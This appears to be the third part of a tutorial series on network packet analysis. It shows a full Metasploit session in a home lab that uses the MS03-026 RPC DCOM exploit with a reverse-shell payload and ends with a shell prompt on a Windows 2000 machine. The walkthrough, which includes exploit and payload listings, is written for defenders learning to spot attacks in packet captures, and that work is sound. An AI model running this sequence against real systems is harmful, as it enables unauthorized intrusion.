If you would like to read the other articles in this series please check out:
- Packet analysis tools and methodology (Part 1)
- Packet analysis tools and methodology (Part 2)
- Packet analysis tools and methodology (Part 4)
On the offensive with Metasploit!
We have seen over the course of the past two articles that there is a variety of port scans one can accomplish, via some well known tools. Also we have covered some of the better known programs, that network security analysts use in an attempt to secure their respective networks. This all leads us to a tool that you may have read about before in an article of mine; Metasploit Framework. Due to its many exploits, payloads, and other advanced features, this tool is quickly gaining in popularity. It is not only popular with security professionals, but also with some other elements of the computer world who do not have your best interests at heart.
The malicious hackers who have adopted this tool due to its relative ease of use, and powerful features have a powerful weapon at their disposal. Though it should be evident to them that with each exploit in the framework, there is a ready-made intrusion detection signature built into it. When this tool was designed the creators of it, HDM, and spoonm were ethical enough to insert an ascii signature that intrusion detection vendors could easily build a signature around. That way this tool is easily detectable when seen by an IDS. Over the course of this article several examples of this ascii signature will be shown.
In the interests of better understanding how your networks could be compromised, we will attack a computer in my home lab. Various attacks will be shown both successful and unsuccessful. Shown as well will be the syntax usage for one of the attacks. Learning to use this tool is relatively easy. One needs to remember as well that there are only so many ways to compromise a computer. The great majority of them continue to evolve around application layer protocols such as HTTP, and FTP. That is due to the simple reason that these protocols must be accessible through the firewall for them to be used. It would be hard to target a protocol used by the operating system for it to run reliably if it does not listen for inbound connections. In other words you cannot really target something that is not listening.
Is anyone listening?
The following examples that we will use all have listening sockets. These services will be RPC, LSASS, and HTTP. We will also use some exploits that will purposely fail, for there is no service listening to be exploited. That way we will be able to see, at the packet level, what it looks like. It is important to recognize not only a successful intrusion attempt, but also an unsuccessful one. So with that in mind, let’s set up our first exploit to be done via Metasploit. If you have read some of my earlier articles you will realize that Metasploit can be used in either win32, or linux. I will show the sequence of events done to configure Metasploit for the first exploit so that all you need to do is emulate it for the remainder of the exploits. Please see the below noted for detailed instructions on how to use this program.
don@linux:~/framework-2.2> ./msfconsole
__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ v2.2 \/ \/ |__|
+ — –=[ msfconsole v2.2 [33 exploits – 33 payloads]
msf >
((Listed above is how you invoke the msfconsole within the framework directory))
msf > show exploits
Metasploit Framework Loaded Exploits
====================================
Credits Metasploit Framework Credits afp_loginext AppleFileServer LoginExt PathName Buffer Overflow apache_chunked_win32 Apache Win32 Chunked Encoding blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow distcc_exec DistCC Daemon Command Execution exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding ia_webmail IA WebMail 3.x Buffer Overflow icecast_header Icecast (<= 2.0.1) Header Overwrite (win32) iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow iis50_printer_overflow IIS 5.0 Printer Buffer Overflow iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
((typing in the above “show exploits” will give you a list of available exploits, this is only a partial list for I have snipped out the bulk for brevities sake))
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 >
((once you have decided which exploit to use you will type “use” followed by the actual exploit name as it appears just like the above noted example))
msf msrpc_dcom_ms03_026 > show options
Exploit Options
===============
Exploit: Name Default Description ——– —— ——- —————— required RHOST The target address required RPORT 135 The target port Target: Windows NT SP6/2K/XP/2K3 ALL
msf msrpc_dcom_ms03_026 >
((typing in the “show options” command will give you a partial list of options you will need to fill in like LHOST ie: localhost or your attacking computers IP address and RHOST the victim computers IP address))
msf msrpc_dcom_ms03_026 > set RHOST 192.168.1.101
RHOST -> 192.168.1.101
msf msrpc_dcom_ms03_026 > set LHOST 192.168.1.102
LHOST -> 192.168.1.102
msf msrpc_dcom_ms03_026 >
((you will now set the options as shown above))
msf msrpc_dcom_ms03_026 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_adduser Windows Execute net user /ADD win32_bind Windows Bind Shell win32_bind_dllinject Windows Bind DLL Inject win32_bind_stg Windows Staged Bind Shell win32_bind_stg_upexec Windows Staged Bind Upload/Execute win32_bind_vncinject Windows Bind VNC Server DLL Inject win32_exec Windows Execute Command win32_reverse Windows Reverse Shell win32_reverse_dllinject Windows Reverse DLL Inject win32_reverse_stg Windows Staged Reverse Shell win32_reverse_stg_ie Windows Reverse InlineEgg Stager win32_reverse_stg_upexec Windows Staged Reverse Upload/Execute win32_reverse_vncinject Windows Reverse VNC Server DLL Inject
((typing in “show payloads” will give you an extensive list of available payloads to attack to the exploit, and this is where Metasploit really shines above other such tools))
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf msrpc_dcom_ms03_026(win32_reverse) >
((once you have picked your payload type enter it as seen above))
msf msrpc_dcom_ms03_026(win32_reverse) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description ——– —— ————- —————— required RHOST 192.168.1.101 The target address required RPORT 135 The target port Payload: Name Default Description ——– ——– ————- —————————————— optional EXITFUNC seh Exit technique: “process”, “thread”, “seh” required LHOST 192.168.1.102 Local address to receive connection required LPORT 4321 Local port to receive connection Target: Windows NT SP6/2K/XP/2K3 ALL
msf msrpc_dcom_ms03_026(win32_reverse) >
((when you type again “show options” you will see that they have all been filled in with the information required))
msf msrpc_dcom_ms03_026(win32_reverse) > set TARGET 0
TARGET -> 0
((the last thing I do is set the target field which encompasses pretty much all win32 operating systems as seen above))
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Connected to REMACT with group ID 0x80b3
[*] Got connection from 192.168.1.101:1028
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>
((lastly as seen above I type in “exploit” to launch the actual itself, and I indeed do the get the reverse shell prompt as seen above))
What this has shown us is that a tool as powerful as Metasploit Framework is relatively easy to use. This really is helpful in letting us recognize what certain exploits look like at the packet level. I have said it before and I will say it again, you will always need to refer to the actual packets themselves to ascertain if a system breach has occurred.
Due to this, it is very helpful to you if you can recognize an exploit for what it is. There is no better way to do that then to actually pull some off yourself in a lab environment. I have gone ahead and run several other exploits for the last part of this article series. In the next, and last part, we will use some of the tools we visited earlier. These tools will help us investigate the binary log that I will have generated for you. For in the last part of this article series we will parse the binary log file through snort, and snortsnarf. That will give us a friendly html file to investigate the snort output. Till then!
If you would like to read the other articles in this series please check out: